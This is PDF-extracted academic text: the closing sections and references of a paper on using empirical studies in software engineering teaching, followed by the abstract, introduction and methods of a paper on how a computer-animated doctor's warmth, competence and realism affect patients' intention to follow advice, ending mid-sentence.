is related to performing the analysis and writing up the case report or thesis. Students do not often have a chance to practice these skills on a regular basis, and thus there are many questions regarding analysis choices and patterns for writing up results that an advisor may be able to help with. Although we rely here only on informal evaluation, these examples have convinced us that case studies of different types are well suited as teaching tools. They require a wide range of skills which the students must acquire, and these skills are applicable in many other settings as well. Perhaps the most important insight to be gained from conducting case studies is that students are faced with a wide variety of data that challenge their preconceptions and develop their ability to observe phenomena in their real-life context. DISCUSSION Implementing a course using empirical instruments provided us with a number of insights. Related to the scientific and organizational perspective, we learned that course preparation causes more effort compared to classic teaching. First, the examples and cases to be used in experiments need to be tailored accordingly: there must be time restrictions due to schedule requirements. This has two major impacts. First, the investigated topic is of reduced complexity, which causes it to be less realistic. Second, research questions must be carefully selected for reasonable treatment within time constraints. Therefore, we consider explorative (curiosity-driven) or confirmative experiments meaningful, i.e., experiments of low criticality. From the teaching perspective, we experienced that the choice of a real world example rather than an artificial toy example has proved to be successful. For example, the experiment outcome from Kuhrmann, Fernandez & Knapp (2013) was a fully implemented process to which the process owner stated that he did not expect the student groups to create Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 28/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 ‘‘such a comprehensive solution in this little time.’’ Another goal—‘‘let students experience the consequences of their decisions’’—was also achieved. For instance, in the course on software process modelling, while implementing the process in a workshop session, we could observe a certain learning curve. One team had a complete design, but selected an inappropriate modelling concept. Later, the team had to refactor the implementation, which was an annoying and time-consuming task, both increasing their awareness of the consequences of certain design decisions. Furthermore, students also experienced how difficult it is to transform informal information or tacit knowledge into process models. The students could also see how difficult it is for individuals to formulate their behaviour in a rule-oriented manner. For the course on software process modelling in Munich, we compared the final grades of both courses and recognized significantly better grades in the second run. During course exams, the students could not only answer all (theoretical) knowledge-related questions, but also all knowledge-transfer and application-related questions. The students usually referred to the practical examples and were able to transfer and apply their experiences to new situations. Finally, the case study-based Master’s theses allowed our students to be embedded in projects with real-life connections. Apart from their educational value for the students, they contributed to the scientific literature and helped students in their early careers. Although our industry connections were important in obtaining the cases, the students themselves learned to be self-directed in their work and gained significant domain knowledge. As thesis supervisors, we found that there was some additional effort in introducing case study methodology to students—methodology courses do not fully prepare students to actually carry out a study of their own, which is to be expected. However, being embedded in the project and receiving feedback from the project environment and its stakeholders meant that it was easy to convince students of the necessity of a structured approach. Once students were up to speed, the extra supervision effort was compensated by more autonomous work on the students’ part. Limitations The guideline presented in this paper has not been systematically tested in different learning environments. Instead, it represents a starting point based on reflection grounded in teaching practice. We consider the limitations of the study in terms of qualitative criteria for validity (c.f. Creswell, 2009). Internal validity concerns the congruence between findings and reality. In this study, internal validity then concerns how credible the guidelines are in light of the realities of software engineering education. As that reality is constantly changing, the match between guidelines and teaching can never be perfect. Our study has applied triangulation to increase the internal validity of the results. We have utilised several types of teaching in different modes and in different universities, and with different teachers, to obtain a richer set of experiences to draw guidelines from. External validity refers to the extent to which findings can be applied to other situations. As our aim is not theory testing, external validity in this article is about enhancing, as far Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 29/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 as possible, the transferability of the results. We argue that the guideline developed herein covers a wide range of teaching and learning situations, and thus can be applied widely in graduate and undergraduate education in software engineering. We have attempted to elucidate the limitations of applying the guideline by mapping study types differently to education in academia and industry, and to different purposes, challenges, and validity concerns of interest to teachers. In addition to these limitations, we see that there are certain situations where the guideline would be unsuitable. First, when the execution of an empirical study would cause ethical problems or legal consequences for any of the involved parties; in this case, the teacher should direct the student to a different task. Second, the guideline relies on the teacher to assess whether a particular student possesses the necessary prerequisite skills to carry out a particular study; the guideline is not transferable if that information is missing. Third, the guideline makes certain assumptions about the learning environment, such as availability of industry partners for Master’s degree projects, and the availability of certain teaching resources for other study types. When attempting to apply the guideline, teachers should consider whether the necessary resources are available. CONCLUSION There is a lack of guidance on how to use empirical studies in software engineering education. In order to address this gap, this paper provides an overview of different types of empirical studies, their suitability for use in education, as well as challenges with respect to their execution. We analysed our own teaching and the different studies that we applied as part of it, and reported on selected studies from existing literature. Rather than having students conduct pure research, we opt for including different empirical instruments into software engineering courses as means to stimulate learning. The present paper provides an initial systematisation of empirical instruments from the educational perspective. We derived a set of purposes and challenges relevant for selecting a particular study type. Furthermore, we also discussed validity constraints regarding the results of course-integrated studies. Based on our experiences, we assigned the different purposes, challenges, and validity constraints to the different study types, and we provided further discussion on motivation and scheduling issues. We also defined a set of further study selection criteria to provide an initial guideline that helps teachers to select and include empirical studies in their courses. We believe the guideline could be used in a wide variety of settings. We note that the guideline is limited in that it considers a limited number of study types and learning outcomes—those that they authors have experience with as teaching aids and study purposes. They may not be suitable in situations where significantly different study types or learning outcomes are called for. Since, to the best of our knowledge, no comparable guidelines exist, we cordially invite teachers and researchers to discuss and improve on this proposal. In particular, future work could focus on applying the guidelines in different kinds of software engineering courses and programs, both within academic university education and in industry training. The purposes, challenges, and constraints presented here could thus be further validated, refined, and perhaps extended. Another particular consideration is how to perform student assessment when using empirical studies for educational purposes, in particularly when group work is involved. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 30/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 What should be assessed, how should assessment be performed fairly when many students are involved, and how should, e.g., knowledge of empirical methods, domain knowledge, procedural knowledge, and the quality of outcomes be balanced in the assessment? We believe that the purposes and validity considerations in Tables 2 and 4 could serve as a starting point for creating rubrics that are relevant for this type of teaching. Finally, further studies are needed to test the effectiveness of courses using the proposed approaches in terms of their ability to teach. The learning outcomes of such courses should be further explored: beyond what is currently known, what do students learn by conducting empirical studies, and how do their learning outcomes differ from other approaches to software engineering education? ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Tekes, the Finnish Funding Agency for Technology and Innovation, as part of the N4S Program of DIGILE (Finnish Strategic Centre for Science, Technology and Innovation in the field of ICT and digital business). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Tekes, the Finnish Funding Agency for Technology and Innovation. Competing Interests The authors declare there are no competing interests. Author Contributions • Fabian Fagerholm, Marco Kuhrmann and Jürgen Münch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data is included in the tables. REFERENCES Ahadi A, Lister R, Haapala H, Vihavainen A. 2015. Exploring machine learning methods to automatically identify students in need of assistance. In: Proceedings of the eleventh annual international conference on international computing education research, ICER ’15. New York: ACM, 121–130. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 31/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Armbrust O, Ebell J, Hammerschall U, Münch J, Thoma D. 2008. Experiences and results from tailoring and deploying a large process standard in a company. Software Process: Improvement and Practice 13(4):301–309. Ball S, Emerson T, Lewis J, Swarthout JT. 2012. Classroom experiments. Available at http://serc.carleton.edu/sp/library/experiments/index.html (accessed on 20 January 2016). Barrows HS, Tamblyn RM. 1980. Problem-based learning: an approach to medical education. New York: Springer Publishing Company, Inc. Basili V, Selby R, Hutchens D. 1986. Experimentation in software engineering. IEEE Transactions on Software Engineering 12(7):733–743 DOI 10.1109/TSE.1986.6312975. Basili VR, Rombach HD. 1988. The TAME project: towards improvement-oriented software environments. IEEE Transactions on Software Engineering 14(6):758–773 DOI 10.1109/32.6156. Baxter P, Jack S. 2008. Qualitative case study methodology: study design and implemen- tation for novice researchers. Qualitative Report 13(4):544–559. Blank S. 2006. The four steps to the epiphany. Foster City: Cafepress.com. Blumenfeld PC, Soloway E, Marx RW, Krajcik JS, Guzdial M, Palincsar A. 1991. Motivating project-based learning: sustaining the doing, supporting the learning. Educational Psychologist 26(3–4):369–398 DOI 10.1080/00461520.1991.9653139. Brügge B, Krusche S, Alperowitz L. 2015. Software engineering project courses with industrial clients. Transactions on Computing Education 15(4):17:1–17:31 DOI 10.1145/2732155. Carver J, Jaccheri L, Morasca S, Shull F. 2003. Issues in using students in empirical studies in software engineering education. In: Proceedings of the 9th international software metrics symposium. 239–249. Carver J, Jaccheri L, Morasca S, Shull F. 2010. A checklist for integrating student empirical studies with research and teaching goals. Empirical Software Engineering 15(1):35–59 DOI 10.1007/s10664-009-9109-9. Cochran-Smith M. 2003. Learning and unlearning: the education of teacher educators. Teaching and Teacher Education 19(1):5–28 DOI 10.1016/S0742-051X(02)00091-4. Creswell J. 2009. Research design: qualitative, quantitative, and mixed methods approaches. 3rd edition. Thousand Oaks: SAGE Publications Inc. Deiters C, Herrmann C, Hildebrandt R, Knauss E, Kuhrmann M, Rausch A, Rumpe B, Schneider K. 2011. GloSE-Lab: teaching global software engineering. In: Proceedings of 6th IEEE international conference on global software engineering. Piscataway: IEEE. Dewey J. 1935. How we think: a restatement of the relation of reflective thinking to the educative process. Boston: DC Heath. Dillon J. 2008. A review of the research on practical work in school science. Technical report. King’s College Available at http://score-education.org/media/3671/review_of_ research.pdf . Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 32/36 https://peerj.com http://serc.carleton.edu/sp/library/experiments/index.html http://dx.doi.org/10.1109/TSE.1986.6312975 http://dx.doi.org/10.1109/32.6156 http://dx.doi.org/10.1080/00461520.1991.9653139 http://dx.doi.org/10.1145/2732155 http://dx.doi.org/10.1007/s10664-009-9109-9 http://dx.doi.org/10.1016/S0742-051X(02)00091-4 http://score-education.org/media/3671/review_of_research.pdf http://score-education.org/media/3671/review_of_research.pdf http://dx.doi.org/10.7717/peerj-cs.131 Easterbrook S, Singer J, Storey M-A, Damian D. 2008. Selecting empirical methods for software engineering research. In: Shull F, Singer J, Sjøberg D, eds. Guide to advanced empirical software engineering. London: Springer. Eisenhardt KM. 1989. Building theories from case study research. The Academy of Management Review 14(4):532–550. Fagerholm F, Guinea AS, Mäenpää H, Münch J. 2017. The RIGHT model for continuous experimentation. Journal of Systems and Software 123:292–305 DOI 10.1016/j.jss.2016.03.034. Fagerholm F, Oza N, Münch J. 2013. A platform for teaching applied distributed software development: the ongoing journey of the Helsinki software factory. In: 3rd international workshop on collaborative teaching of globally distributed software development (CTGDSD). Fagerholm F, Sanchez Guinea A, Mäenpää H, Münch J. 2014a. Building blocks for continuous experimentation. In: Proceedings of the 1st international workshop on rapid continuous software engineering. New York: ACM, 26–35. Fagerholm F, Sanchez Guinea A, Münch J, Borenstein J. 2014b. The role of mentoring and project characteristics for onboarding in open source software projects. In: 8th ACM-IEEE international symposium on software engineering and measurement (ESEM). Frank B. 1997. The impact of classroom experiments on the learning of economics: an empirical investigation. Economic Inquiry 35(4):763–769 DOI 10.1111/j.1465-7295.1997.tb01962.x. Fucci D, Turhan B, Oivo M. 2015. On the effects of programming and testing skills on external quality and productivity in a test-driven development context. In: Proceedings of the 19th international conference on evaluation and assessment in software engineering. New York: ACM, 25:1–25:6. Hatton N, Smith D. 1995. Reflection in teacher education: towards definition and implementation. Teaching and Teacher Education 11(1):33–49 DOI 10.1016/0742-051X(94)00012-U. Hayes J. 2002. Energizing software engineering education through real-world projects as experimental studies. In: 15th conference on software engineering education and training (CSEET). Hevner AR, March ST, Park J, Ram S. 2004. Design science in information systems research. MIS Quarterly 28(1):75–105. Höst M. 2002. Introducing empirical software engineering methods in education. In: Proceedings of the 15th conference on software engineering education and training (CSEET). 170–179. Jones JL, Jones KA. 2013. Teaching reflective practice: implementation in the teacher- education setting. The Teacher Educator 48(1):73–85 DOI 10.1080/08878730.2012.740153. Juristo N, Gómez OS. 2012. Replication of software engineering experiments. In: Meyer B, Nordio M, eds. LASER summer school 2008–2010. Lecture Notes in Computer Science. vol. 7007. Berlin, Heidelberg: Springer, 60–88. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 33/36 https://peerj.com http://dx.doi.org/10.1016/j.jss.2016.03.034 http://dx.doi.org/10.1111/j.1465-7295.1997.tb01962.x http://dx.doi.org/10.1016/0742-051X(94)00012-U http://dx.doi.org/10.1080/08878730.2012.740153 http://dx.doi.org/10.7717/peerj-cs.131 Juristo N, Vegas S. 2011. The role of non-exact replications in software engineering experiments. Empirical Software Engineering 16(3):295–324 DOI 10.1007/s10664-010-9141-9. Keenan E, Steele A, Jia X. 2010. Simulating global software development in a course environment. In: International conference on global software engineering (ICGSE). Piscataway: IEEE. Kitchenham BA, Budgen D, Brereton P. 2015. Evidence-based software engineering and systematic reviews. Boca Raton: CRC Press. Kohavi R, Deng A, Frasca B, Longbotham R, Walker T, Xu Y. 2012. Trustworthy online controlled experiments: five puzzling outcomes explained. In: Proceedings of the 18th ACM SIGKDD international conference on knowledge discovery and data mining, KDD ’12. New York: ACM, 786–794. Koponen IT, Mäntylä T. 2006. Generative role of experiments in physics and in teaching physics: a suggestion for epistemological reconstruction. Science & Education 15(1):31–54 DOI 10.1007/s11191-005-3199-6. Kuhrmann M. 2012. A practical approach to align research with master’s level courses. In: 15th international conference on computational science and engineering. Kuhrmann M. 2015. Crafting a software process improvement approach—a retro- spective systematization. Journal of Software: Evolution and Process 27(2):114–145 DOI 10.1002/smr.1703. Kuhrmann M, Femmer H, Eckhardt J. 2014. Controlled experiments as means to teach soft skills in software engineering. In: Yu L, ed. Overcoming challenges in software engineering education: delivering non-technical knowledge and skills. Hershey: IGI Global. Kuhrmann M, Fernandez DM, Knapp A. 2013. Who cares about software process modeling? A first investigation about the perceived value of process engineering and process consumption. In: 14th international conference on product focused software development and process improvement (PROFES). Kuhrmann M, Fernández DM, Münch J. 2013. Teaching software process modeling. In: 35th international conference on software engineering (ICSE). Kuhrmann M, Münch J. 2016a. Distributed software development with one hand tied behind the back: a course unit to experience the role of communication in GSD. In: 11th International Conference on Global Software Engineering Workshops (ICGSEW). Kuhrmann M, Münch J. 2016b. When teams go crazy: an environment to experience group dynamics in software project management courses. New York: ACM, 412–421. Longi K, Leinonen J, Nygren H, Salmi J, Klami A, Vihavainen A. 2015. Identification of programmers from typing patterns. In: Proceedings of the 15th Koli calling conference on computing education research, Koli Calling ’15. New York: ACM, 60–67. Ludewig J, Bassler T, Deininger M, Schneider K, Schwille J. 1992. SESAM-simulating software projects. In: Proceedings of the fourth international conference on Software engineering and knowledge engineering, 1992. DOI 10.1109/SEKE.1992.227898. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 34/36 https://peerj.com http://dx.doi.org/10.1007/s10664-010-9141-9 http://dx.doi.org/10.1007/s11191-005-3199-6 http://dx.doi.org/10.1002/smr.1703 http://dx.doi.org/10.1109/SEKE.1992.227898 http://dx.doi.org/10.7717/peerj-cs.131 Münch J, Rombach D, Rus I. 2003. Creating an advanced software engineering labora- tory by combining empirical studies with process simulation. In: 4th international workshop on software process simulation and modeling (ProSim). Navarro EO, Van der Hoek A. 2007. Comprehensive evaluation of an educational software engineering simulation environment. In: 20th conference on software engineering education and training (CSEET). Oza N, Münch J, Garbajosa J, Yague A, Ortega EG. 2013. Identifying potential risks and benefits of using cloud in distributed software development. In: 14th international conference on product-focused software development and process improvement (Profes). Park CL. 2004. What is the value of replicating other studies? Research Evaluation 13(3):189–195 DOI 10.3152/147154404781776400. Parker J. Using laboratory experiments to teach introductory economics. Working paper, Reed College. Available at http://academic.reed.edu/economics/parker/ExpBook95.pdf (accessed on 23 October 2014). Rein A-D, Münch J. 2013. Feature prioritization based on mock purchase: a mobile case study. In: Lean enterprise software and systems conference (LESS). Richardson I, Milewski AE, Mullick N. 2006. Distributed development—an education perspective on the global studio project. In: International conference on software engineering (ICSE). New York: ACM. Ries E. 2011. The lean startup: how today’s entrepreneurs use continuous innovation to create radically successful businesses. New York: Crown Business. Rombach D, Münch J, Ocampo A, Humphrey WS, Burton D. 2008. Teaching dis- ciplined software development. International Journal of Systems and Software 81(5):747–763. Runeson P. 2003. Using students as experiment subjects—an analysis on graduate and freshmen student data. In: 7th international conference on empirical assessment in software engineering (EASE). Runeson P, Höst M. 2009. Guidelines for conducting and reporting case study re- search in software engineering. Empirical Software Engineering 14(2):131–164 DOI 10.1007/s10664-008-9102-8. Runeson P, Höst M, Rainer A, Regnell B. 2012. Case study research in software engineer- ing: guidelines and examples. Hoboken: John Wiley & Sons. Schön DA. 1983. The reflective practitioner: how professionals think in action. New York: Basic Books. Shull F, Singer J, Sjøberg DIK. 2008. Guide to advanced empirical software engineering. London: Springer. Stake RE. 1995. The art of case study research. Thousand Oaks: SAGE Publications, Inc. Staron M. 2007. Using Students as subjects in experiments—a quantitative analysis of the influence of experimentation on students’ learning proces. In: 20th conference on software engineering education training. 221–228. Tuckman BW. 1965. Developmental sequence in small groups. Psychological Bulletin 63(6):384–399 DOI 10.1037/h0022100. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 35/36 https://peerj.com http://dx.doi.org/10.3152/147154404781776400 http://academic.reed.edu/economics/parker/ExpBook95.pdf http://dx.doi.org/10.1007/s10664-008-9102-8 http://dx.doi.org/10.1037/h0022100 http://dx.doi.org/10.7717/peerj-cs.131 Wohlin C, Runeson P, Höst M, Ohlsson MC, Regnell B, Wesslén A. 2012. Experimenta- tion in software engineering. Berlin, Heidelberg: Springer. Wood DF. 2003. Problem based learning. BMJ 326(7384):328–330 DOI 10.1136/bmj.326.7384.328. Yin R. 2009. Case study research: design and methods. 4th edition. Thousand Oaks: SAGE Publications, Inc. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 36/36 https://peerj.com http://dx.doi.org/10.1136/bmj.326.7384.328 http://dx.doi.org/10.7717/peerj-cs.131 work_sytjzbtv25fdlo34wpz4crxwue ---- The doctor’s digital double: how warmth, competence, and animation promote adherence intention The doctor’s digital double: how warmth, competence, and animation promote adherence intention Zhengyan Dai* and Karl F. MacDorman* School of Informatics and Computing, Indiana University, Indianapolis, IN, USA * These authors contributed equally to this work. ABSTRACT Background: Each year, patient nonadherence to treatment advice costs the US healthcare system more than $300 billion and results in 250,000 deaths. Developing virtual consultations to promote adherence could improve public health while cutting healthcare costs and usage. However, inconsistencies in the realism of computer-animated humans may cause them to appear eerie, a phenomenon termed the uncanny valley. Eeriness could reduce a virtual doctor’s credibility and patients’ adherence. Methods: In a 2 � 2 � 2 between-groups posttest-only experiment, 738 participants played the role of a patient in a hypothetical virtual consultation with a doctor. The consultation varied in the doctor’s Character (good or poor bedside manner), Outcome (received a fellowship or sued for malpractice), and Depiction (a recorded video of a real human actor or of his 3D computer-animated double). Character, Outcome, and Depiction were designed to manipulate the doctor’s level of warmth, competence, and realism, respectively. Results: Warmth and competence increased adherence intention and consultation enjoyment, but realism did not. On the contrary, the computer-animated doctor increased adherence intention and consultation enjoyment significantly more than the doctor portrayed by a human actor. We propose that enjoyment of the animated consultation caused the doctor to appear warmer and more real, compensating for his realism inconsistency. Expressed as a path model, this explanation fit the data. Discussion: The acceptance and effectiveness of the animation should encourage the development of virtual consultations, which have advantages over creating content with human actors including ease of scenario revision, internationalization, localization, personalization, and web distribution. Subjects Human-Computer Interaction, Agents and Multi-Agent Systems, Graphics, Multimedia, Social Computing Keywords Adherence, Anthropomorphism, Avatars, Computer animation, Doctor–patient simulations, Health literacy, Interactive narratives, Uncanny valley INTRODUCTION The persuasiveness of a message depends on its source, content, and the extent to which it is processed systematically or heuristically (Chaiken, 1980; Van Der Heide & Schumaker, 2013). Systematic processing assesses the content of a message, while heuristic processing assesses features unrelated to content. When the message source is another human, features affecting persuasion include physical appearance, perceived character traits, How to cite this article Dai Z, MacDorman KF. 2018. The doctor’s digital double: how warmth, competence, and animation promote adherence intention. PeerJ Comput. Sci. 4:e168 DOI 10.7717/peerj-cs.168 Submitted 1 August 2018 Accepted 30 September 2018 Published 12 November 2018 Corresponding author Karl F. MacDorman, kmacdorm@indiana.edu Academic editor Julita Vassileva Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.168 Copyright 2018 Dai and MacDorman Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.168 mailto:kmacdorm@�indiana.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.168 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ and behavior (Wood, Solomon & Englis, 2005). For character traits, the primary dimension of interpersonal perception is warmth, and the secondary dimension is competence (Cuddy, Fiske & Glick, 2008; Fiske et al., 2002). Warmth indicates the intention to help or harm others and competence indicates the capacity to do so (Fiske, Cuddy & Glick, 2007). Competence and facets of warmth, like goodwill and trustworthiness, have been used extensively to assess source credibility (McCroskey & Teven, 1999; McGinnies & Ward, 1980); they are important in the literature on persuasion because credible sources are more persuasive (Jain & Posavac, 2001; Maddux & Rogers, 1980; Pornpitakpan, 2004; Sertoglu, Catl & Korkmaz, 2014). Persuasive strategies that increase perceived warmth and competence have been investigated in doctor–patient consultations (Cousin, Mast & Jaunin-Stalder, 2013; Janssen & Lagro-Janssen, 2012). Patients’ perception of their doctor’s warmth and competence increases adherence, that is, clinically unsupervised compliance with treatment advice. Communication strategies that express warmth increase patients’ perception of their doctor as caring, understanding, and empathy; thus, patients prefer these strategies (Cousin et al., 2012; Mast, Hall & Roter, 2007; O’Hair, 1986; O’Hair et al., 1987). The perception of a doctor’s empathy and competence (which includes expertise) increases the patients’ satisfaction with and adherence to treatment advice (Kim, Kaplowitz & Johnston, 2004; Ohana & Mash, 2015; Willson & McNamara, 1982). While satisfaction with communication increases adherence, dissatisfaction has the opposite effect (Burgoon et al., 1987; Marple et al., 2007). Warmth and competence improve the patents’ prognosis and quality of life by increasing adherence (Bennett et al., 2011; Borel et al., 2014; Swain et al., 2015). Warmth, competence, attractiveness, and other factors affecting source credibility apply to virtual as well as real humans (Garau et al., 2005; Keeling, McGoldrick & Beatty, 2010). Virtual humans offer a familiar interface that can be used to change people’s beliefs, attitudes, intentions, and behaviors (Jin & Sung, 2010; Peña & Yoo, 2014) while disseminating professional advice. Along with the content of a message, virtual humans deliver nonverbal cues about warmth and competence (An et al., 2013; Anam, Andrade & Ruiz, 2016; Tongpeth, Du & Clark, 2018). These cues reduce the receiver’s uncertainty during communication and support decision-making (Burgoon & Hale, 1988; Burgoon & Walther, 1990). A virtual human’s nonverbal cues enable the experience of social presence, relatedness, and affinity (Bente et al., 2008)—an experience that precedes interpersonal trust (Cyr et al., 2007). Although both real and virtual humans vary in form, behavior, and interactivity, virtual humans also vary in human realism (Bailenson et al., 2006). Designing perfectly or even consistently realistic virtual humans is an unsolved challenge (Chattopadhyay & MacDorman, 2016; Gilbert & Forney, 2015). We assume that all present-day virtual humans are realism inconsistent because the goal of realism is human indistinguishability, and its degree of attainment will vary depending on the difficulty of making each feature indistinguishable. Features that have been experimentally contrasted in realism include face and eyes (MacDorman et al., 2009; Seyama & Nagayama, 2007) and voice and body (Mitchell et al., 2011). A literature review concluded features that are inconsistent Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 2/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ in their realism elicit feelings of eeriness (Kätsyri et al., 2015), a phenomenon known as the uncanny valley (Mathur & Reichling, 2016; Moore, 2012; Mori 2012). Eeriness could function like other negative evaluations to reduce source credibility. Thus, a fundamental problem with virtual humans is that while delivering intended warmth and competence cues, they also deliver unintended cues about inconsistent realism (Chattopadhyay & MacDorman, 2016). These unintended cues may negate the positive effects of warmth and competence cues on persuasion. Specifically, a virtual doctor’s realism and potential for eeriness might affect a patient’s intention to adhere to treatment advice by influencing the virtual doctor’s persuasiveness relative to a real human. As this topic has not been studied empirically, the present study is intended to fill this gap. Despite their differences, a virtual human could be as persuasive as a real human (Patel & MacDorman, 2015; Zanbaka, Goolkasian & Hodges, 2006)—or even more persuasive (Bickmore, Pfeifer & Paasche-Orlow, 2009). However, Raij et al. (2007) found that a virtual patient induced less empathy and rapport-building and worse attitudes in doctors than a real patient. Although these studies investigated the effect of realism on persuasion, only one employed an experimentally controlled stimulus, that is, a digital double (Patel & MacDorman, 2015). Moreover, the ways in which warmth, competence, realism, and eeriness together affect adherence intention in a hypothetical virtual consultation have not been investigated. Based on the finding that warmth, including its goodwill and trustworthiness facets, and competence increase a source’s persuasiveness in both real and virtual environments, we hypothesized that (H1) a high-warmth source will be more persuasive than a low-warmth source and (H2) a high-competence source will be more persuasive than a low-competence source. In the virtual consultation, the high-warmth source was portrayed as a doctor with good bedside manner and the low-warmth source was portrayed as a doctor with poor bedside manner; the high-competence source was portrayed as a doctor who would at the end of the consultation receive a fellowship and the low-competence source was portrayed as a doctor who would instead be sued for malpractice (videos: DOI 10.6084/m9.figshare.7300088). In research on how physical appearance influences persuasion, attractiveness has been the most widely investigated dimension. Attractiveness increases persuasiveness (Chaiken, 1979; Holzwarth, Janiszewski & Neumann, 2006; Jin & Bolebruch, 2009; Joseph, 1982; Khan & Sutcliffe, 2014; LaCrosse, 1975; Pallak, 1983; Pallak, Murroni & Koch, 1983), though with exceptions (Skalski & Tamborini, 2007). We would expect inconsistent realism and eeriness to have the opposite effect. Nevertheless, Patel & MacDorman (2015) found that although an animated character was more eerie, less attractive, and less human than its real counterpart, it did not reduce the intention to comply with advice. Based on the assumption that flaws in realism cause negative affective evaluations, namely, eeriness that decreases source credibility, we hypothesized that (H3) a high-realism source will be more persuasive than a low-realism source. In the virtual consultation, the high-realism source was the doctor depicted by a real human actor and the low-realism source was the doctor depicted by the actor’s computer-animated double (Fig. 1). Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 3/29 https://doi.org/10.6084/m9.figshare.7300088 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ The future success of virtual consultations depends on patients’ willingness to accept this new technology. To this end, our study also aims to investigate the ways in which the message source’s warmth, competence, and realism influence the enjoyment of the virtual consultation. Smiling and other nonverbal cues indicating warmth and social presence have been found to increase enjoyment and trust when interacting with virtual human characters (Guadagno, Swinth & Blascovich, 2011; Qiu & Benbasat, 2009). Whether virtual or real, given that a doctor’s warmth and competence increase patient satisfaction (Kim, Kaplowitz & Johnston, 2004; Ohana & Mash, 2015; Willson & McNamara, 1982), we hypothesized that the consultation will be more enjoyable (H4) with the high-warmth source than with the low-warmth source and (H5) with the high-competence source than with the low-competence source. Computer animation can often be more enjoyable than reality. For example, virtual human characters can increase satisfaction more than real people (Bickmore, Pfeifer & Paasche-Orlow, 2009). However, the characters tested were typically less realistic than the human model employed in this study and thus—according to Mori (2012) uncanny valley hypothesis—were less likely to appear eerie. Nevertheless, animation realism can Depiction C h ar ac te r Low Realism High Realism H ig h W ar m th Lo w W ar m th Figure 1 The real human actor and his digital double used in the experiment. In the role of a patient in a hypothetical virtual consultation, the participant interacted with a doctor. A 2 � 2 � 2 between- groups posttest-only experimental design was used. The doctor’s Character was good or poor bedside manner, Outcome was received a fellowship or sued for malpractice, and Depiction was a recorded video of a real human actor or of his 3D computer-animated double. Character, Outcome, and Depiction were designed to manipulate the doctor’s level of warmth, competence, and realism, respectively. Full-size DOI: 10.7717/peerj-cs.168/fig-1 Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 4/29 http://dx.doi.org/10.7717/peerj-cs.168/fig-1 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ increase a virtual character’s appeal and even uncanniness can elicit positive affect as exhibited by facial expressions and self-reports (Kokkinara & McDonnell, 2015; Mäkäräinen et al., 2015). Leaving open the direction of the effect, we hypothesized that (H6) realism will influence the enjoyment of the virtual consultation. METHODS The experiment was set up as a web-based interactive visual narrative. Participants playing as patient selected responses to a video of a dramatic character playing as doctor in a hypothetical virtual consultation. The doctor’s bedside manner, personal outcome, and depiction were manipulated to examine whether warmth, competence, and realism, respectively, increase adherence intention and enjoyment; and whether eeriness decreases adherence intention and enjoyment. Warmth was manipulated based on the scripted narrative through the doctor’s spoken words, voice and prosody, facial expressions, and body movements. Competence was manipulated through a subplot culminating in the doctor being either honored with a fellowship or sued for malpractice. Realism was manipulated by using a recorded video of either a real actor playing the doctor in a consultation room or computer-animated models simulating the same scenario. Participant characteristics and sampling The sample was comprised of randomly selected undergraduate and graduate students, age 18 or older, from a Midwestern US public university system. Participation was voluntary, and testing was conducted at a time and location chosen by the participant. The study was approved by the Indiana University Office of Research Administration (January 5, 2018, OHRP Category 7, Study No. 1712290464). Informed consent was obtained from all participants. Documentation of informed consent was waived under 45 CFR 46.117(c) or 21 CFR 56.109(c)(1). Explanation of aspects of the experiment that could have affected its outcome was delayed until after participation under 45 CFR 46.116(d). The research was performed in accordance with all relevant federal, state, and university standards, policies, and regulations on human subjects research. Research design The experiment had a 2 � 2 � 2 between-groups posttest-only design (Independent variables). Each participant was randomly assigned to one of eight treatment groups, representing either a low or high level of warmth, competence, and realism. Procedure After providing demographic information and reading introductory text, each participant assumed the role of a patient in a virtual consultation (Appendix A: Script). The consultation began with the patient’s blood sugar testing higher than normal. Dr. Richards appeared in a video wearing a white shirt, tie, and lab coat with a stethoscope draped over his shoulders. He was standing and holding a clipboard with the patient’s test results. The consultation proceeded through seven hypothetical doctor–patient exchanges and a final reply from the doctor. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 5/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ In each doctor–patient exchange, the participant replied to the doctor by choosing one of four text-based responses. To maintain experimental control, the doctor’s statements were phrased to follow logically from any of the preceding responses. After the consultation, the participant completed a questionnaire for the posttest indices (Dependent variables). Independent variables The independent variables were Character, 